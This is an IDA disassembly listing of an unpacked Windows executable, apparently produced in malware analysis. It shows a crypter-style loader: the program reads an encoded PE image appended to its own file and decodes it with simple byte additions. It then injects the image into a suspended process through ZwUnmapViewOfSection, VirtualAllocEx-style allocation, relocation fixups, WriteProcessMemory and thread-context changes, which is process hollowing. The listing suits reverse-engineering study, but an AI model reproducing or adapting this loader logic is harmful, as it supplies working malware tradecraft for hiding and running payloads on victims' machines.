;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 701A67156382136FADA8F5BDA9B577C7
; File Name : u:\work\701a67156382136fada8f5bda9b577c7_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000729D ( 29341.)
; Section size in file : 0000729D ( 29341.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401000(FILE *File,int,int,int,int)
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+66�p
var_13C4 = dword ptr -13C4h
var_13C0 = dword ptr -13C0h
var_13BC = dword ptr -13BCh
var_13B8 = dword ptr -13B8h
var_13B4 = dword ptr -13B4h
var_13B0 = dword ptr -13B0h
var_13AC = word ptr -13ACh
var_1370 = dword ptr -1370h
var_136C = byte ptr -136Ch
DstBuf = dword ptr -128Ch
var_1288 = dword ptr -1288h
var_1284 = dword ptr -1284h
var_1280 = dword ptr -1280h
var_127C = dword ptr -127Ch
var_1278 = dword ptr -1278h
File = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
mov eax, 13C4h
call __alloca_probe
push ebx
mov ebx, [esp+13C8h+File]
push ebp
push 2 ; Origin
push 0 ; Offset
push ebx ; File
call _fseek
push ebx ; File
call _ftell
mov ebp, eax
mov eax, Offset
push 0 ; Origin
push eax ; Offset
push ebx ; File
sub ebp, eax
call _fseek
add esp, 1Ch
cmp ebp, 40h
jnb short loc_401048
pop ebp
xor al, al
pop ebx
add esp, 13C4h
retn
; ---------------------------------------------------------------------------
loc_401048: ; CODE XREF: sub_401000+3B�j
mov eax, Offset
push 0 ; Origin
push eax ; Offset
push ebx ; File
call _fseek
push ebx ; File
push 1 ; Count
lea ecx, [esp+13E0h+DstBuf]
push 40h ; ElementSize
push ecx ; DstBuf
call _fread
mov cl, byte_40B044
mov dl, byte_40B045
add esp, 1Ch
xor eax, eax
lea esp, [esp+0]
loc_401080: ; CODE XREF: sub_401000+94�j
add byte ptr [esp+eax+13CCh+DstBuf], cl
add byte ptr [esp+eax+13CCh+DstBuf+1], dl
add eax, 2
cmp eax, 40h
jb short loc_401080
push esi
push edi
mov ecx, 10h
lea esi, [esp+13D4h+DstBuf]
lea edi, [esp+13D4h+var_13AC]
rep movsd
cmp [esp+13D4h+var_13AC], 5A4Dh
jnz loc_40115E
mov eax, [esp+13D4h+var_1370]
lea edx, [eax+18h]
cmp ebp, edx
jb loc_40115E
mov ecx, Offset
push 0 ; Origin
add ecx, eax
push ecx ; Offset
push ebx ; File
call _fseek
push ebx ; File
push 1 ; Count
lea edx, [esp+13E8h+DstBuf]
push 18h ; ElementSize
push edx ; DstBuf
call _fread
mov cl, byte_40B044
mov dl, byte_40B045
add esp, 1Ch
xor eax, eax
lea ebx, [ebx+0]
loc_401100: ; CODE XREF: sub_401000+114�j
add byte ptr [esp+eax+13D4h+DstBuf], cl
add byte ptr [esp+eax+13D4h+DstBuf+1], dl
add eax, 2
cmp eax, 18h
jb short loc_401100
mov eax, [esp+13D4h+DstBuf]
mov ecx, [esp+13D4h+var_1288]
mov edx, [esp+13D4h+var_1284]
mov [esp+13D4h+var_13C4], eax
mov eax, [esp+13D4h+var_1280]
mov [esp+13D4h+var_13B8], eax
mov eax, [esp+13D4h+var_1278]
cmp ax, 0E0h
mov [esp+13D4h+var_13C0], ecx
mov ecx, [esp+13D4h+var_127C]
mov [esp+13D4h+var_13BC], edx
mov [esp+13D4h+var_13B4], ecx
mov [esp+13D4h+var_13B0], eax
jz short loc_40116B
loc_40115E: ; CODE XREF: sub_401000+B1�j
; sub_401000+C0�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 13C4h
retn
; ---------------------------------------------------------------------------
loc_40116B: ; CODE XREF: sub_401000+15C�j
push ebx ; File
push 1 ; Count
lea edx, [esp+13DCh+DstBuf]
push 0E0h ; ElementSize
push edx ; DstBuf
call _fread
mov cl, byte_40B044
mov dl, byte_40B045
add esp, 10h
xor eax, eax
loc_401191: ; CODE XREF: sub_401000+1A7�j
add byte ptr [esp+eax+13D4h+DstBuf], cl
add byte ptr [esp+eax+13D4h+DstBuf+1], dl
add eax, 2
cmp eax, 0E0h
jb short loc_401191
mov ecx, 38h
lea esi, [esp+13D4h+DstBuf]
lea edi, [esp+13D4h+var_136C]
rep movsd
movzx esi, word ptr [esp+13D4h+var_13C0+2]
lea esi, [esi+esi*4]
shl esi, 3
push esi ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
push ebx ; File
push 1 ; Count
mov ebp, eax
lea eax, [esp+13E0h+DstBuf]
push esi ; ElementSize
push eax ; DstBuf
call _fread
add esp, 14h
xor eax, eax
test esi, esi
jbe short loc_401215
mov cl, byte_40B044
mov dl, byte_40B045
jmp short loc_401200
; ---------------------------------------------------------------------------
align 10h
loc_401200: ; CODE XREF: sub_401000+1F4�j
; sub_401000+213�j
add byte ptr [esp+eax+13D4h+DstBuf], cl
add byte ptr [esp+eax+13D4h+DstBuf+1], dl
add eax, 2
cmp eax, esi
jb short loc_401200
loc_401215: ; CODE XREF: sub_401000+1E6�j
mov ecx, esi
mov edx, ecx
mov eax, [esp+13D4h+arg_8]
shr ecx, 2
mov edi, ebp
lea esi, [esp+13D4h+DstBuf]
rep movsd
mov ecx, edx
mov edx, [esp+13D4h+var_13C0]
and ecx, 3
rep movsb
mov edi, [esp+13D4h+arg_4]
mov ecx, 10h
lea esi, [esp+13D4h+var_13AC]
rep movsd
mov ecx, [esp+13D4h+var_13C4]
mov edi, [esp+13D4h+arg_C]
mov [eax], ecx
mov ecx, [esp+13D4h+var_13BC]
mov [eax+4], edx
mov edx, [esp+13D4h+var_13B8]
mov [eax+8], ecx
mov ecx, [esp+13D4h+var_13B4]
mov [eax+0Ch], edx
mov edx, [esp+13D4h+var_13B0]
mov [eax+10h], ecx
mov [eax+14h], edx
mov eax, [esp+13D4h+arg_10]
mov ecx, 38h
lea esi, [esp+13D4h+var_136C]
rep movsd
pop edi
pop esi
mov [eax], ebp
pop ebp
mov al, 1
pop ebx
add esp, 13C4h
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4012A0 proc near ; CODE XREF: WinMain(x,x,x,x)+8D�p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_8]
mov ecx, [eax+3Ch]
push esi
mov esi, [eax+20h]
xor edx, edx
mov eax, ecx
div esi
push edi
test edx, edx
jnz short loc_4012BA
mov edi, ecx
jmp short loc_4012C0
; ---------------------------------------------------------------------------
loc_4012BA: ; CODE XREF: sub_4012A0+14�j
lea edi, [eax+1]
imul edi, esi
loc_4012C0: ; CODE XREF: sub_4012A0+18�j
mov eax, [esp+8+arg_4]
movzx eax, word ptr [eax+6]
test eax, eax
jle short loc_4012F9
push ebx
mov ebx, [esp+0Ch+arg_C]
push ebp
add ebx, 8
mov ebp, eax
loc_4012D7: ; CODE XREF: sub_4012A0+55�j
mov ecx, [ebx]
test ecx, ecx
jz short loc_4012F1
xor edx, edx
mov eax, ecx
div esi
test edx, edx
jnz short loc_4012EB
add edi, ecx
jmp short loc_4012F1
; ---------------------------------------------------------------------------
loc_4012EB: ; CODE XREF: sub_4012A0+45�j
inc eax
imul eax, esi
add edi, eax
loc_4012F1: ; CODE XREF: sub_4012A0+3B�j
; sub_4012A0+49�j
add ebx, 28h
dec ebp
jnz short loc_4012D7
pop ebp
pop ebx
loc_4012F9: ; CODE XREF: sub_4012A0+2A�j
mov eax, edi
pop edi
pop esi
retn
sub_4012A0 endp
; ---------------------------------------------------------------------------
align 10h
mov ecx, [esp+8]
push esi
mov esi, [esp+8]
xor edx, edx
mov eax, esi
div ecx
test edx, edx
jnz short loc_401317
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_401317: ; CODE XREF: .text:00401311�j
inc eax
imul eax, ecx
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_401320(FILE *File,int,int,int,int,int)
sub_401320 proc near ; CODE XREF: WinMain(x,x,x,x)+C6�p
var_33294 = dword ptr -33294h
var_33290 = dword ptr -33290h
DstBuf = byte ptr -3328Ch
var_3328B = byte ptr -3328Bh
var_32000 = byte ptr -32000h
File = dword ptr 4
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, 33294h
call __alloca_probe
mov eax, Offset
push ebx
push ebp
push esi
mov esi, [esp+332A0h+File]
push edi
push 0 ; Origin
push eax ; Offset
push esi ; File
call _fseek
mov edx, [esp+332B0h+arg_8]
movzx eax, word ptr [edx+6]
mov ecx, [esp+332B0h+arg_C]
mov ebx, [ecx+3Ch]
add esp, 0Ch
test eax, eax
jle short loc_40137E
mov edx, [esp+332A4h+arg_10]
add edx, 14h
lea esp, [esp+0]
loc_401370: ; CODE XREF: sub_401320+5C�j
mov ecx, [edx]
cmp ecx, ebx
jnb short loc_401378
mov ebx, ecx
loc_401378: ; CODE XREF: sub_401320+54�j
add edx, 28h
dec eax
jnz short loc_401370
loc_40137E: ; CODE XREF: sub_401320+3D�j
push esi ; File
push ebx ; Count
lea eax, [esp+332ACh+DstBuf]
push 1 ; ElementSize
push eax ; DstBuf
call _fread
add esp, 10h
xor ecx, ecx
test ebx, ebx
mov [esp+332A4h+var_33290], eax
jbe short loc_4013B3
mov al, byte_40B044
mov dl, byte_40B045
loc_4013A4: ; CODE XREF: sub_401320+91�j
add [esp+ecx+332A4h+DstBuf], al
add [esp+ecx+332A4h+var_3328B], dl
add ecx, 2
cmp ecx, ebx
jb short loc_4013A4
loc_4013B3: ; CODE XREF: sub_401320+77�j
mov ebp, [esp+332A4h+arg_14]
mov eax, [esp+332A4h+var_33290]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
lea esi, [esp+332A4h+DstBuf]
mov edi, ebp
rep movsd
mov ecx, edx
and ecx, 3
cmp eax, ebx
rep movsb
jnz loc_401508
mov eax, [esp+332A4h+arg_C]
mov esi, [eax+3Ch]
mov ecx, [eax+20h]
xor edx, edx
mov eax, esi
div ecx
test edx, edx
jnz short loc_4013F7
mov eax, esi
jmp short loc_4013FB
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: sub_401320+D1�j
inc eax
imul eax, ecx
loc_4013FB: ; CODE XREF: sub_401320+D5�j
add eax, ebp
mov [esp+332A4h+var_33294], eax
mov eax, [esp+332A4h+arg_8]
cmp word ptr [eax+6], 0
mov [esp+332A4h+var_33290], 0
jbe loc_4014FB
mov ebp, [esp+332A4h+arg_10]
add ebp, 8
loc_401425: ; CODE XREF: sub_401320+1D5�j
mov ebx, [ebp+8]
test ebx, ebx
jbe loc_4014BF
mov eax, [ebp+0]
cmp ebx, eax
jbe short loc_401439
mov ebx, eax
loc_401439: ; CODE XREF: sub_401320+115�j
mov esi, Offset
mov ecx, [ebp+0Ch]
add ecx, esi
mov esi, [esp+332A4h+File]
push 0 ; Origin
push ecx ; Offset
push esi ; File
call _fseek
push esi ; File
push ebx ; Count
lea edx, [esp+332B8h+var_32000]
push 1 ; ElementSize
push edx ; DstBuf
call _fread
add esp, 1Ch
xor ecx, ecx
test ebx, ebx
jbe short loc_40147D
mov edi, edi
loc_401470: ; CODE XREF: sub_401320+15B�j
add [esp+ecx+332A4h+var_32000], 0F0h
inc ecx
cmp ecx, ebx
jb short loc_401470
loc_40147D: ; CODE XREF: sub_401320+14C�j
mov edi, [esp+332A4h+var_33294]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
lea esi, [esp+332A4h+var_32000]
rep movsd
mov ecx, edx
and ecx, 3
cmp eax, ebx
rep movsb
jnz short loc_401508
mov eax, [esp+332A4h+arg_C]
mov ecx, [eax+20h]
mov esi, [ebp+0]
xor edx, edx
mov eax, esi
div ecx
test edx, edx
jz short loc_4014B9
lea esi, [eax+1]
imul esi, ecx
loc_4014B9: ; CODE XREF: sub_401320+191�j
add [esp+332A4h+var_33294], esi
jmp short loc_4014DC
; ---------------------------------------------------------------------------
loc_4014BF: ; CODE XREF: sub_401320+10A�j
mov esi, [ebp+0]
test esi, esi
jz short loc_4014DC
xor edx, edx
mov eax, esi
div ecx
test edx, edx
jnz short loc_4014D4
mov eax, esi
jmp short loc_4014D8
; ---------------------------------------------------------------------------
loc_4014D4: ; CODE XREF: sub_401320+1AE�j
inc eax
imul eax, ecx
loc_4014D8: ; CODE XREF: sub_401320+1B2�j
add [esp+332A4h+var_33294], eax
loc_4014DC: ; CODE XREF: sub_401320+19D�j
; sub_401320+1A4�j
mov edx, [esp+332A4h+arg_8]
mov eax, [esp+332A4h+var_33290]
movzx edx, word ptr [edx+6]
inc eax
add ebp, 28h
cmp eax, edx
mov [esp+332A4h+var_33290], eax
jl loc_401425
loc_4014FB: ; CODE XREF: sub_401320+F5�j
pop edi
pop esi
pop ebp
mov al, 1
pop ebx
add esp, 33294h
retn
; ---------------------------------------------------------------------------
loc_401508: ; CODE XREF: sub_401320+B6�j
; sub_401320+17A�j
pop edi
pop esi
pop ebp
xor al, al
pop ebx
add esp, 33294h
retn
sub_401320 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401520 proc near ; CODE XREF: sub_4016D0+F2�p
arg_8 = dword ptr 0Ch
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_8]
mov ecx, [eax+88h]
test ecx, ecx
jz short locret_401597
mov edx, [eax+8Ch]
test edx, edx
jz short locret_401597
push ebp
mov ebp, [esp+4+arg_14]
push esi
push edi
mov edi, [esp+0Ch+arg_10]
lea esi, [ecx+edi]
mov ecx, [eax+1Ch]
mov eax, [esi+4]
sub ebp, ecx
test eax, eax
jz short loc_401594
push ebx
loc_401553: ; CODE XREF: sub_401520+71�j
mov eax, [esi+4]
sub eax, 8
shr eax, 1
test eax, eax
lea edx, [esi+8]
jle short loc_40158A
mov ebx, eax
loc_401564: ; CODE XREF: sub_401520+68�j
xor ecx, ecx
mov cx, [edx]
mov eax, ecx
and eax, 0FFFh
add eax, [esi]
and ecx, 0F000h
add eax, edi
cmp ecx, 3000h
jnz short loc_401584
add [eax], ebp
loc_401584: ; CODE XREF: sub_401520+60�j
add edx, 2
dec ebx
jnz short loc_401564
loc_40158A: ; CODE XREF: sub_401520+40�j
mov eax, [edx+4]
test eax, eax
mov esi, edx
jnz short loc_401553
pop ebx
loc_401594: ; CODE XREF: sub_401520+30�j
pop edi
pop esi
pop ebp
locret_401597: ; CODE XREF: sub_401520+C�j
; sub_401520+16�j
retn
sub_401520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4015A0 proc near ; CODE XREF: WinMain(x,x,x,x)+EB�p
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_44 = dword ptr -44h
var_40 = byte ptr -40h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 64h
push edi
xor eax, eax
mov [esp+68h+var_44], 0
mov ecx, 10h
lea edi, [esp+68h+var_40]
rep stosd
mov edi, [esp+68h+arg_4]
mov ecx, [esp+68h+arg_0]
push edi
lea eax, [esp+6Ch+var_44]
push eax
push 0
push 0
push 4
push 0
push 0
push 0
push ecx
push 0
call ds:dword_40900C
test eax, eax
jz loc_401674
push ebx
push ebp
push esi
mov esi, [esp+74h+arg_8]
mov dword ptr [esi], 10007h
mov edx, [edi+4]
push esi
push edx
call ds:dword_409008
mov ecx, [esi+0A4h]
mov ebp, [esp+74h+arg_C]
mov edx, [edi]
lea eax, [esp+74h+var_64]
push eax
push 4
push ebp
add ecx, 8
push ecx
push edx
call ds:dword_409004
mov esi, [ebp+0]
mov ecx, [edi]
mov ebx, ds:dword_409000
push 1Ch
lea eax, [esp+78h+var_60]
push eax
push esi
push ecx
call ebx
test eax, eax
jz short loc_401661
jmp short loc_401640
; ---------------------------------------------------------------------------
align 10h
loc_401640: ; CODE XREF: sub_4015A0+9B�j
; sub_4015A0+BF�j
cmp [esp+74h+var_50], 10000h
jz short loc_401661
mov eax, [esp+74h+var_54]
push 1Ch
lea edx, [esp+78h+var_60]
add esi, eax
mov eax, [edi]
push edx
push esi
push eax
call ebx
test eax, eax
jnz short loc_401640
loc_401661: ; CODE XREF: sub_4015A0+99�j
; sub_4015A0+A8�j
sub esi, [ebp+0]
mov [ebp+4], esi
pop esi
pop ebp
pop ebx
mov eax, 1
pop edi
add esp, 64h
retn
; ---------------------------------------------------------------------------
loc_401674: ; CODE XREF: sub_4015A0+3E�j
xor eax, eax
pop edi
add esp, 64h
retn
sub_4015A0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+4]
mov ecx, [eax+88h]
test ecx, ecx
jz short loc_40169E
mov ecx, [eax+8Ch]
test ecx, ecx
jz short loc_40169E
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40169E: ; CODE XREF: .text:0040168C�j
; .text:00401696�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016B0 proc near ; CODE XREF: WinMain(x,x,x,x)+178�p
arg_0 = dword ptr 4
push offset aYkjtrytryntnMr ; "ykjtrytryntn,mrtme6bmn325byu435fcq35533"...
call _printf
mov eax, [esp+4+arg_0]
add esp, 4
push 0
push eax
call ds:dword_409010
retn
sub_4016B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4016D0 proc near ; CODE XREF: WinMain(x,x,x,x)+163�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_1C = dword ptr 20h
arg_20 = dword ptr 24h
arg_2C = dword ptr 30h
arg_D0 = dword ptr 0D4h
arg_DC = dword ptr 0E0h
arg_2F8 = dword ptr 2FCh
arg_2FC = dword ptr 300h
push ebx
mov ebx, [esp+4+arg_2F8]
push ebp
mov ebp, [esp+8+arg_8]
cmp [ebp+1Ch], ebx
push esi
push edi
mov edi, [esp+10h+arg_14]
jnz short loc_40170F
mov eax, [esp+10h+arg_2FC]
cmp edi, eax
ja short loc_40170F
mov esi, [esp+10h+arg_1C]
lea ecx, [esp+10h+arg_8]
push ecx
push 40h
push eax
push ebx
push esi
mov dword_40B6F4, ebx
call ds:dword_409020
jmp short loc_401769
; ---------------------------------------------------------------------------
loc_40170F: ; CODE XREF: sub_4016D0+16�j
; sub_4016D0+21�j
mov esi, [esp+10h+arg_1C]
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset aNtdll_dll ; "ntdll.dll"
mov dword_40B6E4, esi
mov dword_40B6E8, ebx
call ds:dword_40901C
push eax
call ds:dword_409018
mov edx, dword_40B6E8
mov ecx, dword_40B6E4
push edx
push ecx
call eax
test eax, eax
jz short loc_401751
cmp byte ptr [esp+10h+arg_8], 1
jnz short loc_401769
loc_401751: ; CODE XREF: sub_4016D0+78�j
mov edx, [ebp+1Ch]
push 40h
push 3000h
push edi
push edx
push esi
call ds:dword_409014
mov dword_40B6F4, eax
loc_401769: ; CODE XREF: sub_4016D0+3D�j
; sub_4016D0+7F�j
mov eax, dword_40B6F4
test eax, eax
jnz short loc_4017D7
mov eax, [ebp+88h]
test eax, eax
jz loc_40186A
mov eax, [ebp+8Ch]
test eax, eax
jz loc_40186A
push 40h
push 3000h
push edi
push 0
push esi
call ds:dword_409014
test eax, eax
mov dword_40B6F4, eax
jz loc_40186A
mov ecx, [esp+10h+arg_C]
mov edx, [esp+10h+arg_4]
push eax
mov eax, [esp+14h+arg_10]
push eax
mov eax, [esp+18h+arg_0]
push ecx
push ebp
push edx
push eax
call sub_401520
mov eax, dword_40B6F4
add esp, 18h
test eax, eax
jz loc_40186A
loc_4017D7: ; CODE XREF: sub_4016D0+A0�j
mov edi, [esp+10h+arg_D0]
push offset aWriteprocessme ; "WriteProcessMemory"
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_40901C
push eax
call ds:dword_409018
push 0
push 4
push offset dword_40B6F4
add edi, 8
push edi
push esi
call eax
mov ecx, [esp+10h+arg_0]
mov edx, [ecx+3Ch]
mov eax, dword_40B6F4
mov ecx, [esp+10h+arg_10]
mov [edx+ecx+34h], eax
mov eax, dword_40B6F4
cmp eax, ebx
mov [esp+10h+arg_2C], 10007h
jnz short loc_401839
mov edx, [ebp+10h]
add edx, [ebp+1Ch]
mov [esp+10h+arg_DC], edx
jmp short loc_401845
; ---------------------------------------------------------------------------
loc_401839: ; CODE XREF: sub_4016D0+158�j
mov ecx, [ebp+10h]
add ecx, eax
mov [esp+10h+arg_DC], ecx
loc_401845: ; CODE XREF: sub_4016D0+167�j
mov eax, [esp+10h+arg_20]
lea edx, [esp+10h+arg_2C]
push edx
push eax
mov dword_40B6EC, esi
mov dword_40B6E0, eax
call dword_40B6F8
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40186A: ; CODE XREF: sub_4016D0+AA�j
; sub_4016D0+B8�j ...
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
retn
sub_4016D0 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, dword_40B6E0
push eax
mov byte_40B6F0, 1
call ds:dword_409024
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+186�p
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = dword ptr -518h
var_514 = dword ptr -514h
var_510 = dword ptr -510h
var_50C = dword ptr -50Ch
var_508 = dword ptr -508h
var_4F0 = dword ptr -4F0h
var_4B0 = byte ptr -4B0h
var_3AC = dword ptr -3ACh
var_2CC = byte ptr -2CCh
hInstance = dword ptr 4
hPrevInstance = dword ptr 8
lpCmdLine = dword ptr 0Ch
nShowCmd = dword ptr 10h
sub esp, 524h
push ebx
push ebp
push esi
push edi
push 104h
lea eax, [esp+538h+var_4B0]
push eax
push 0
call ds:dword_409030
push 6
lea ecx, [esp+538h+var_4B0]
push ecx
call ds:dword_40902C
lea edx, [esp+534h+var_4B0]
push offset aRb ; "rb"
push edx ; char *
call _fopen
mov esi, eax
add esp, 8
test esi, esi
jz loc_401A76
lea eax, [esp+534h+var_524]
push eax ; int
lea ecx, [esp+538h+var_3AC]
push ecx ; int
lea edx, [esp+53Ch+var_508]
push edx ; int
lea eax, [esp+540h+var_4F0]
push eax ; int
push esi ; File
call sub_401000
add esp, 14h
test al, al
jz loc_401A76
mov edi, [esp+534h+var_524]
push edi
lea ecx, [esp+538h+var_3AC]
push ecx
lea edx, [esp+53Ch+var_508]
push edx
lea eax, [esp+540h+var_4F0]
push eax
call sub_4012A0
add esp, 10h
push 40h
push 1000h
mov ebp, eax
push ebp
push 0
call ds:dword_409028
mov ebx, eax
test ebx, ebx
jz loc_401A76
push ebx ; int
push edi ; int
lea ecx, [esp+53Ch+var_3AC]
push ecx ; int
lea edx, [esp+540h+var_508]
push edx ; int
lea eax, [esp+544h+var_4F0]
push eax ; int
push esi ; File
call sub_401320
push esi ; File
call _fclose
lea ecx, [esp+550h+var_520]
push ecx
lea edx, [esp+554h+var_2CC]
push edx
lea eax, [esp+558h+var_518]
push eax
lea ecx, [esp+55Ch+var_4B0]
push ecx
call sub_4015A0
mov edx, [esp+560h+var_51C]
mov eax, [esp+560h+var_520]
add esp, 2Ch
push edx
mov edx, [esp+538h+var_518]
push eax
mov eax, [esp+53Ch+var_514]
sub esp, 2CCh
mov edi, esp
sub esp, 10h
mov ecx, 0B3h
lea esi, [esp+818h+var_2CC]
rep movsd
mov ecx, esp
mov [ecx], edx
mov edx, [esp+818h+var_510]
mov [ecx+4], eax
mov eax, [esp+818h+var_50C]
mov [ecx+8], edx
mov edx, [esp+818h+var_524]
mov [ecx+0Ch], eax
lea ecx, [esp+818h+var_4B0]
push ecx
push ebp
push ebx
push edx
lea eax, [esp+828h+var_3AC]
push eax
lea ecx, [esp+82Ch+var_508]
push ecx
lea edx, [esp+830h+var_4F0]
push edx
call sub_4016D0
add esp, 300h
test eax, eax
jnz short loc_401A20
mov eax, dword_40B6EC
push eax
call sub_4016B0
add esp, 4
loc_401A20: ; CODE XREF: WinMain(x,x,x,x)+170�j
push offset aWriteprocessme ; "WriteProcessMemory"
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_40901C
push eax
call ds:dword_409018
mov ecx, dword_40B6F4
mov edx, dword_40B6EC
push 0
push ebp
push ebx
push ecx
push edx
call eax
mov eax, dword_40B6E0
push eax
mov byte_40B6F0, 1
call ds:dword_409024
mov al, byte_40B6F0
test al, al
jnz short loc_401A76
mov ecx, dword_40B6EC
push 0
push ecx
call ds:dword_409010
loc_401A76: ; CODE XREF: WinMain(x,x,x,x)+48�j
; WinMain(x,x,x,x)+70�j ...
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 524h
retn 10h
_WinMain@16 endp
; [0000000E BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [000000E9 BYTES: COLLAPSED FUNCTION _fread. PRESS KEYPAD "+" TO EXPAND]
; [00000159 BYTES: COLLAPSED FUNCTION _ftell. PRESS KEYPAD "+" TO EXPAND]
; [0000008E BYTES: COLLAPSED FUNCTION _fseek. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000003D BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _printf. PRESS KEYPAD "+" TO EXPAND]
; [00000056 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
; [0000002A BYTES: COLLAPSED FUNCTION __fsopen. PRESS KEYPAD "+" TO EXPAND]
; [00000013 BYTES: COLLAPSED FUNCTION _fopen. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_fast_error_exit:
cmp dword_40B704, 1
jnz short loc_401EA4
call __FF_MSGBANNER
loc_401EA4: ; CODE XREF: .text:00401E9D�j
push dword ptr [esp+4]
call __NMSG_WRITE
push 0FFh
call unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
_check_managed_app:
push 0
call ds:dword_40901C
cmp word ptr [eax], 5A4Dh
jnz short loc_401EE8
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_401EE8
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_401EFE
cmp eax, 20Bh
jz short loc_401EEB
loc_401EE8: ; CODE XREF: .text:00401EC7�j
; .text:00401ED4�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_401EEB: ; CODE XREF: .text:00401EE6�j
xor eax, eax
cmp dword ptr [ecx+84h], 0Eh
jbe short locret_401F0F
cmp [ecx+0F8h], eax
jmp short loc_401F0C
; ---------------------------------------------------------------------------
loc_401EFE: ; CODE XREF: .text:00401EDF�j
xor eax, eax
cmp dword ptr [ecx+74h], 0Eh
jbe short locret_401F0F
cmp [ecx+0E8h], eax
loc_401F0C: ; CODE XREF: .text:00401EFC�j
setnz al
locret_401F0F: ; CODE XREF: .text:00401EF4�j
; .text:00401F04�j
retn
; [000001DC BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; [00000046 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [000000DE BYTES: COLLAPSED FUNCTION __filbuf. PRESS KEYPAD "+" TO EXPAND]
; [000001EE BYTES: COLLAPSED FUNCTION __read. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000033D BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000048 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__initterm_e:
push esi
mov esi, eax
xor eax, eax
jmp short loc_4027DB
; ---------------------------------------------------------------------------
